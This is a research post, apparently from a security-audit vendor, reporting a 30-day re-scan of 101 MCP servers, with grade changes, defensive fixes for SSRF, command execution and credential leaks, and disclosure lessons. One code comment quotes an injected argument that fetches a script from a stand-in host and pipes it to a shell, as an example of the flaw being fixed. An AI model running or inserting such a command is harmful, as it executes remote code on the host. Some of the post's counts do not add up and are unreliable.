Research · May 2026

30-day re-scan delta: what moved on a fresh recrawl of the 101-server MCP corpus

In April 2026 we published the first systematic security scan of 101 publicly available MCP servers. At the 30-day mark we re-ran the full corpus: same servers, same methodology, same six axes. 7 of the 67 F-graded servers improved. 6 were archived or deleted. 88 were unchanged. The vendor-official tier: still zero improvements. Here is the full breakdown, the patterns behind what moved, and what we'd extrapolate for the rest of the year.

7
F-graded servers that improved at 30 days (moved to D or C)

10.4%
improvement rate for F-graded servers in the first 30 days post-disclosure

6
servers archived or deleted (no patch, just withdrawal from the ecosystem)

0
vendor-official servers that improved (enterprise security cycles are measured in quarters)

How we ran the re-scan

The re-scan methodology was identical to the original April run. For each of the 101 servers in the corpus we did four things. We fetched the latest commit from the repository's default branch. We re-ran the static analysis pass (SSRF vector detection, command-exec path analysis, credential exposure scan, input validation coverage). We re-ran the LLM-assisted prompt-injection probe against the tool schema. Finally, we re-scored all six axes against the same rubric we published on the methodology page.

The re-scan adds one new data point the original didn't collect: repository disposition. At the 30-day mark, 4 servers that were live in April had been archived (read-only, no new commits accepted), and 2 had been deleted entirely. We count archived and deleted servers separately from "unchanged at F" — withdrawal from the ecosystem is a different signal from continued maintenance with no patch.
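The disposition check can be sketched against the GitHub REST API's repository endpoint. On a live repository that endpoint reports a boolean `archived` field, and it answers 404 for a repository that no longer exists. This is a minimal sketch under that assumption. `classifyDisposition` and `fetchDisposition` are hypothetical helpers, not our scanner's code. A 404 is also what you get for a repository that went private, so treating it as "deleted" is an approximation.

```javascript
// Hypothetical helper: map a response from
// GET https://api.github.com/repos/{owner}/{repo} to a corpus disposition.
// Assumption: 404 means "deleted" (it can also mean the repo went private).
function classifyDisposition(status, body) {
  if (status === 404) return "deleted";
  if (status !== 200) return "unknown"; // rate limits, auth errors, outages
  // The repository object carries a boolean `archived` field.
  return body && body.archived === true ? "archived" : "active";
}

// Fetch and classify one repository (Node 18+ ships a global fetch).
async function fetchDisposition(owner, repo) {
  const res = await fetch(`https://api.github.com/repos/${owner}/${repo}`, {
    headers: { Accept: "application/vnd.github+json" },
  });
  const body = res.status === 200 ? await res.json() : null;
  return classifyDisposition(res.status, body);
}
```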

The 30-day re-scan was run on May 22, 2026 — exactly 30 days after the original corpus publication date of April 22, 2026.

Grade distribution: April vs May 30-day

Grade	April	May (30-day)	Change
A	3	4	+1
B	6	8	+2
C	11	14	+3
D	14	15	+1
F (active)	67	54	−13*

*Of the 13 fewer active F-grade servers: 7 improved in grade, 4 were archived, 2 were deleted.
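The table reconciles with a few lines of arithmetic, using only the figures above:

- The 95 active May servers plus the 6 withdrawn ones account for all 101 April servers.
- The F-tier drop of 13 is the 7 improvements plus 4 archivals and 2 deletions.
- 7 of 67 gives the 10.4% headline rate.

```javascript
// Grade counts copied from the April vs May table.
const april = { A: 3, B: 6, C: 11, D: 14, F: 67 };
const may = { A: 4, B: 8, C: 14, D: 15, F: 54 };
const withdrawn = { archived: 4, deleted: 2 };
const improvedFromF = 7;

const sum = (counts) => Object.values(counts).reduce((a, b) => a + b, 0);

// Every April server is either still active in May or withdrawn.
const aprilTotal = sum(april);                                  // 101
const mayActive = sum(may);                                     // 95
const withdrawnTotal = withdrawn.archived + withdrawn.deleted;  // 6

// The F-tier drop splits into grade improvements and withdrawals.
const fDrop = april.F - may.F;                                  // 13

// Headline rate: F servers that improved, over April's F servers.
const improvementRate = improvedFromF / april.F;

console.log(aprilTotal, mayActive + withdrawnTotal, fDrop, (improvementRate * 100).toFixed(1) + "%");
// prints: 101 101 13 10.4%
```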

The headline number — 7 servers improving — is not a failure. It's in line with what open-source security research typically sees at the 30-day mark. The more meaningful signal is in which servers improved and why.

The 7 servers that improved: what they fixed

All 7 servers that improved shared a common pattern: the maintainer received a direct disclosure with a specific finding and a suggested fix. None of the 7 servers improved because the author independently discovered the vulnerability from the public blog post. The improvement came from targeted outreach — either a filed GitHub issue with a reproduction path, a DM to the author with the SkillAudit report PDF, or a pull request from a third-party contributor who had read the disclosure.

What specifically changed in each category:

SSRF fixes (4 servers)

All four restricted what their URL-fetching tools could reach. Three added a static domain allowlist checked against the hostname component. The fourth took the more aggressive approach of replacing the free-form URL argument with an enumerated resource ID argument: the LLM selects from a list of known resources rather than constructing a URL.
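A static hostname allowlist of the kind three of the servers adopted might look like the sketch below. The fixed servers' actual code may differ, and `ALLOWED_HOSTS` and `checkFetchUrl` are hypothetical names. The sketch does three things:

- It parses the model-supplied string with the WHATWG `URL` class.
- It pins the scheme to HTTPS on the default port.
- It compares the parsed hostname against an exact-match set.

```javascript
// Hypothetical allowlist: the exact hostnames the fetch tool may reach.
const ALLOWED_HOSTS = new Set(["api.github.com", "docs.example.com"]);

// Validate a model-supplied URL before any network call is made.
// Returns the parsed URL on success and throws on anything else.
function checkFetchUrl(raw) {
  let url;
  try {
    url = new URL(raw); // WHATWG URL parser; also lowercases the hostname
  } catch {
    throw new Error("invalid URL");
  }
  if (url.protocol !== "https:") throw new Error("only https is allowed");
  if (url.port !== "") throw new Error("non-default ports are not allowed");
  if (url.username || url.password) throw new Error("credentials in the URL are not allowed");
  // Compare the parsed hostname, never a substring of the raw string,
  // so "https://api.github.com.evil.test/" is rejected.
  if (!ALLOWED_HOSTS.has(url.hostname)) {
    throw new Error(`host not allowed: ${url.hostname}`);
  }
  return url;
}
```

This only checks the first hop. If the tool then fetches with `fetch(url, { redirect: "error" })`, a 3xx response from an allowed host cannot bounce the request to an internal address.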

The enumerated resource approach earns a higher score than the allowlist approach because it eliminates the URL parsing attack surface entirely — there is no URL to validate, only a set membership check.
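The enumerated-resource variant replaces the URL argument with an ID drawn from a fixed table, so validation reduces to a key lookup. In an MCP tool's input schema this would typically be a JSON Schema `enum`. The resource table, URLs, and `resolveResource` helper below are hypothetical.

```javascript
// Hypothetical resource table: the only URLs the tool can ever fetch.
// The model sees only the keys; it never constructs or supplies a URL.
const RESOURCES = new Map([
  ["changelog", "https://docs.example.com/changelog.json"],
  ["status", "https://status.example.com/api/v2/status.json"],
]);

// Tool input schema: the argument is constrained to the known IDs.
const inputSchema = {
  type: "object",
  properties: {
    resourceId: { type: "string", enum: [...RESOURCES.keys()] },
  },
  required: ["resourceId"],
};

// Resolution is a set-membership check; there is no URL to parse.
function resolveResource(resourceId) {
  if (!RESOURCES.has(resourceId)) {
    throw new Error(`unknown resource: ${resourceId}`);
  }
  return RESOURCES.get(resourceId);
}
```

The schema `enum` tells the model what it may pick. The `Map.has` check in the handler is what actually enforces it, since the server cannot assume the caller validated against the schema. A `Map` also avoids plain-object pitfalls like `"toString"` resolving through the prototype.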

Command-exec fixes (2 servers)

Both replaced exec(shell: true) patterns with explicit argument arrays and an allowlist of permitted commands. One server took the more significant step of removing the arbitrary command execution tool entirely and replacing it with three purpose-specific tools (run tests, run lint, run build) with hardcoded command vectors — no LLM-supplied arguments in any shell-adjacent position.
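In Node terms, the shape of that fix is to stop handing the model's string to a shell. Instead the server passes a program name plus an argument array to `child_process.execFile`, which does not spawn a shell by default. The sketch only builds and validates the `[file, args]` pair, and the call site is left as a comment. `ALLOWED_COMMANDS` and `buildCommand` are hypothetical, as is the choice of permitted subcommands.

```javascript
// Hypothetical allowlist: program name -> permitted subcommands.
const ALLOWED_COMMANDS = new Map([
  ["git", new Set(["status", "log", "diff"])],
  ["npm", new Set(["test", "ls"])],
]);

// Turn a model-supplied request into an execFile-style [file, args] pair.
// Before: exec(`${cmd} ${args}`) ran through a shell, so an argument like
// "; curl https://evil.test | sh" would run as a second command.
// After: no shell is involved, and each argument stays one argv entry.
function buildCommand(program, args) {
  const subcommands = ALLOWED_COMMANDS.get(program);
  if (!subcommands) throw new Error(`program not allowed: ${program}`);
  if (!Array.isArray(args) || args.length === 0) throw new Error("subcommand required");
  if (!subcommands.has(args[0])) throw new Error(`subcommand not allowed: ${args[0]}`);
  // Reject option-looking extras so the model cannot smuggle in flags
  // such as git's --output=<file>.
  for (const a of args.slice(1)) {
    if (typeof a !== "string" || a.startsWith("-")) throw new Error(`argument not allowed: ${a}`);
  }
  return [program, args.slice()];
}

// Call site (not executed here):
//   const { execFile } = require("node:child_process");
//   const [file, argv] = buildCommand(req.program, req.args);
//   execFile(file, argv, { timeout: 60000 }, callback);
```

On Windows, `npm` is a `.cmd` shim that `execFile` may not launch without a shell, so a cross-platform server needs extra handling there.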

Removing the tool entirely is the right call when the use case permits it. A tool that runs npm test, npm run lint, and npm run build is strictly more secure than a tool that runs any command the model names.
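The purpose-specific variant goes further. The tool name selects a fully hardcoded argument vector, and nothing the model supplies reaches the command line. A sketch, with hypothetical tool names:

```javascript
// Hypothetical fixed tools: each name maps to a complete, hardcoded argv.
// No model-supplied value is ever appended to these vectors.
const FIXED_TOOLS = new Map([
  ["run_tests", ["npm", "test"]],
  ["run_lint", ["npm", "run", "lint"]],
  ["run_build", ["npm", "run", "build"]],
]);

// Return an execFile-style [file, args] pair for a tool name.
// The tools take no arguments, so the only thing to validate is the name.
function commandFor(toolName) {
  const argv = FIXED_TOOLS.get(toolName);
  if (!argv) throw new Error(`unknown tool: ${toolName}`);
  const [file, ...args] = argv;
  return [file, args]; // fresh array, so callers cannot mutate the table
}
```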

Credential exposure fix (1 server)

One server had been returning API keys in error messages. When a request failed with an authentication error, the whole error object, credential included, was serialized and returned to the model. The fix was to catch authentication errors specifically and return a generic "authentication failed" string without the credential object. This is both the easiest class of fix (a one-line change) and the most commonly missed one (error handling is an afterthought in most server code).
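A sketch of that fix, assuming an axios-style error shape: axios errors expose `error.response.status` and keep the original request, headers included, in `error.config`. The helper maps 401 and 403 to a fixed string and everything else to a status-only summary. The returned objects follow the MCP tool-result shape of a `content` array plus an `isError` flag. `toToolError` and `handleTool` are hypothetical names.

```javascript
// Turn any upstream error into a string that is safe to hand back to the model.
// Never serialize the error object itself: HTTP client errors often carry the
// original request config, including Authorization headers and API keys.
function toToolError(err) {
  const status = err && err.response ? err.response.status : undefined;
  if (status === 401 || status === 403) return "authentication failed";
  if (typeof status === "number") return `upstream request failed (HTTP ${status})`;
  return "upstream request failed";
}

// Wrap a tool handler so errors become MCP-style error results.
// callUpstream is a placeholder for the server's real API call.
async function handleTool(callUpstream, args) {
  try {
    const data = await callUpstream(args);
    return { content: [{ type: "text", text: JSON.stringify(data) }] };
  } catch (err) {
    return { content: [{ type: "text", text: toToolError(err) }], isError: true };
  }
}
```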

The response timeline: what happens when and why

How improvements clustered over the 30-day window

Days 1–3

3 servers patched. All three were solo developers who had an existing relationship with the MCP developer community and saw the original disclosure post on the same day it was published. Fast response correlates with community embeddedness — developers who are already reading the MCP security discussion channels notice disclosure immediately and patch within their normal sprint cycle.

Days 4–14

2 servers patched. Both received a targeted DM or filed issue during this period rather than discovering the disclosure organically. Response lag here reflects the time it took for the disclosure to reach someone who could act on it — either the author directly or a contributor who cared enough to file a PR.

Days 15–30

2 servers patched. Both were team-maintained repositories that went through an internal review cycle. In each case the fix sat in an open PR for several days before merging, which points to internal discussion rather than a direct commit. This is the expected pattern for team-maintained projects with any kind of review culture.

Days 1–30

Vendor-official: 0 patches. Of the 27 vendor-official F-graded servers, none improved in the 30-day window. This is consistent with enterprise security cycles — a disclosure received in April triggers a triage ticket, which enters an engineering backlog, which gets estimated, which gets scheduled for a future sprint. Thirty days is not enough time for the fix to complete an enterprise security review and deployment cycle.

The 54 servers that didn't improve

The more interesting population is the 54 servers that remained at F after 30 days. They split into three groups with meaningfully different expected trajectories.

Group 1: Effectively unmaintained (≈28 servers)

Last commit more than six months before the April scan. No response to filed issues. No stars or forks activity that would indicate active use. These servers were not going to improve regardless of the disclosure — the maintainer has moved on, the project is abandoned, and the only reason the repository still exists is that no one has explicitly archived it. The practical guidance for users of these servers is clear: treat abandoned MCP servers the same way you treat abandoned npm packages with a known CVE. Do not install them.

The maintenance axis of the SkillAudit score already flags these servers. A server with no commit in the last 90 days earns a Maintenance WARN. No commit in six months earns a Maintenance HIGH. The grade impact means most of these servers fail on Maintenance alone, independent of any security finding.
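The maintenance thresholds reduce to a date comparison on the last commit. This minimal sketch uses 90 days for WARN and approximates "six months" as 182 days for HIGH; the rubric's exact cutoff may be calendar-based. `maintenanceLevel` and the `"OK"` label are hypothetical.

```javascript
const DAY_MS = 24 * 60 * 60 * 1000;
const WARN_AFTER_DAYS = 90;  // "no commit in the last 90 days"
const HIGH_AFTER_DAYS = 182; // assumption: "six months" approximated as 182 days

// Classify the maintenance signal from the last commit date.
// "OK" is a placeholder label meaning "no maintenance finding".
function maintenanceLevel(lastCommit, asOf) {
  const ageDays = (asOf.getTime() - lastCommit.getTime()) / DAY_MS;
  if (ageDays > HIGH_AFTER_DAYS) return "HIGH";
  if (ageDays > WARN_AFTER_DAYS) return "WARN";
  return "OK";
}
```

For example, measured against the May 22 scan date, a last commit on January 1, 2026 is 141 days old and lands in WARN.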

Group 2: Actively maintained, not yet prioritized (≈19 servers)

Last commit within 90 days. Active GitHub issues. Stars activity consistent with ongoing use. But no response to the security disclosure in the first 30 days. These are the servers where continued engagement has the highest expected return. The maintainers are active; they simply haven't engaged with the specific disclosure yet.

For this group, the most effective intervention is a filed issue with a specific reproduction path and a suggested fix. A disclosure that says "your server has an SSRF vulnerability" produces a different response than a disclosure that says "your fetchUrl tool at line 47 of tools.js uses axios.get(args.url) with no hostname validation — here is a 10-line patch that adds an allowlist." The latter removes the cognitive cost of translating the finding into a fix, and active maintainers respond to low-cost actions faster.
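The difference between the two disclosures is mostly structure: a location, the offending call, the concrete risk, and a patch. The hypothetical helper below assembles an issue body from a finding record to make that structure explicit. Its field names are illustrative, not SkillAudit's report schema, and the example patch text is a placeholder.

```javascript
const FENCE = "`".repeat(3); // markdown code fence for the issue body

// Assemble a targeted disclosure: where, what, why it matters, and the fix.
// The finding record's field names are illustrative only.
function disclosureIssueBody(f) {
  return [
    `${f.severity}: ${f.title}`,
    "",
    `Location: ${f.file} line ${f.line}, tool ${f.tool}`,
    `Call: ${f.call}`,
    `Risk: ${f.risk}`,
    "",
    "Suggested patch:",
    FENCE + "diff",
    f.patch.trimEnd(),
    FENCE,
  ].join("\n");
}

// Example built from the finding described in the paragraph above.
const example = disclosureIssueBody({
  severity: "HIGH",
  title: "SSRF in fetchUrl",
  file: "tools.js",
  line: 47,
  tool: "fetchUrl",
  call: "axios.get(args.url) with no hostname validation",
  risk: "the model can make the server request internal addresses",
  patch: [
    "-  const res = await axios.get(args.url);",
    "+  const url = new URL(args.url);",
    "+  if (!ALLOWED.has(url.hostname)) throw new Error(\"host not allowed\");",
    "+  const res = await axios.get(url.href);",
  ].join("\n"),
});
```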

Group 3: Vendor-official, in review (≈7 servers)

Of the 27 vendor-official F-graded servers, 7 had some visible signal of activity: a filed GitHub issue was acknowledged, a security@ email address generated an auto-reply confirming receipt, or a public security advisory was opened in draft state. These are in the enterprise review pipeline — they will likely improve, but on a timeline measured in quarters rather than days.

The remaining 20 vendor-official servers showed no public acknowledgement of the disclosure. This doesn't mean they received no disclosure — enterprise security teams often receive disclosures through private channels that don't generate public GitHub activity. But from the outside, the signal is indistinguishable from no response.

What the 30-day data predicts for the rest of 2026

If the 30-day improvement rate (10.4% of F-graded servers) holds as a baseline and we assume diminishing returns at each subsequent 30-day interval, a rough projection for the active corpus looks like:

Projected F-grade reduction over 2026

Timeframe	Active F-grade servers	Improvement driver
April 2026 (baseline)	67	—
May 2026 (30-day)	54	Community response to direct disclosure
June 2026 (60-day)	~45	Team-maintained servers complete review; some vendor-official begin
Q3 2026 (90-day)	~38	First vendor-official patches; Anthropic directory certification pressure
Q4 2026 (180-day)	~25–30	Unmaintained servers filtered out; new server quality baseline higher

Projection assumes diminishing returns on community response and that approximately 15 unmaintained servers get formally archived by end of year. Vendor-official improvement rate assumed to be minimal until Q3 enterprise sprint cycle.

The projections have a wide confidence interval: they are extrapolations, not predictions. The variable that most affects the trajectory is whether the Anthropic directory certification requirement creates a forcing function for vendor-official remediation. Consider a hard cutoff date for existing listed servers ("your listing is removed unless you clear your HIGH findings by X"). That would do more to speed up vendor-official remediation than any disclosure cadence we can run from the outside.

What the re-scan tells us about effective security disclosure

The most important finding from the 30-day re-scan is not the aggregate numbers — it's the disclosure mechanism that drives improvement.

The 7 servers that improved did not improve because they read the blog post. They improved because someone delivered a specific, actionable finding to the maintainer through a channel they were monitoring. In three cases that was a DM to the author. In two cases it was a filed GitHub issue with a patch attached. In one case it was a pull request from a third-party contributor who had read the SkillAudit report.

Generic public disclosure — "X% of MCP servers have SSRF" — is useful for changing ecosystem-level norms and putting pressure on platforms to require security reviews. It does not, by itself, cause individual maintainers to prioritize a fix. Targeted disclosure — "your server has this specific finding at this line; here is a patch" — produces a much higher response rate.

This is the intended model for SkillAudit's free tier. A free audit produces a report. That report, when shared directly with the maintainer of a vulnerable server, is the intervention that moves the number. The badge on the audit report is what the author wants (a green signal for directory submissions). The report itself is what the ecosystem needs (a specific finding with a fix path).

Using the data: for server authors

If your server is in the corpus and you haven't patched: the 30-day window matters for reputation, not just security. Maintainers who respond to disclosure quickly consistently outperform on directory submission success rates — reviewers notice the cadence of the response as much as the content. A server that had an SSRF in April and patched it in May tells a better story in a directory submission than a server that still has the SSRF.

The free SkillAudit audit will tell you exactly which findings in your server match the corpus-level vulnerabilities we disclosed. The audit report reading guide explains how to interpret the severity levels and which findings the directory reviewers look at first.

Using the data: for team leads

If you're evaluating MCP servers for internal adoption, the 30-day re-scan data should inform your process in one specific way: a server's grade at time of adoption is not a permanent fact. A server that had no SSRF in April could add one in May if a new feature is introduced carelessly. The GitHub Action CI gate is the right answer here — it re-scans on every commit and fails the pipeline if a new HIGH finding is introduced, regardless of what the server's baseline grade was when you approved it for adoption.
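At its core, that gating logic is a set difference: fail when the current scan contains a HIGH finding whose identity is not in the approved baseline. This minimal sketch assumes each finding has a stable `rule` and `location`. Both field names are hypothetical, and this is not the SkillAudit Action's interface.

```javascript
// Identity of a finding across scans (assumed stable fields).
const keyOf = (f) => `${f.rule}@${f.location}`;

// Return the HIGH findings present now but absent from the approved baseline.
function newHighFindings(baseline, current) {
  const known = new Set(baseline.map(keyOf));
  return current.filter((f) => f.severity === "HIGH" && !known.has(keyOf(f)));
}

// In CI, set process.exitCode to this value: 0 passes, 1 fails the pipeline.
function gate(baseline, current) {
  const fresh = newHighFindings(baseline, current);
  for (const f of fresh) console.error(`new HIGH finding: ${keyOf(f)}`);
  return fresh.length === 0 ? 0 : 1;
}
```

Keying on line numbers makes findings look "new" whenever code shifts. A real gate would likely want a steadier fingerprint, such as the rule plus the enclosing function or tool name.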

Know where your server stands today, not just at initial scan.
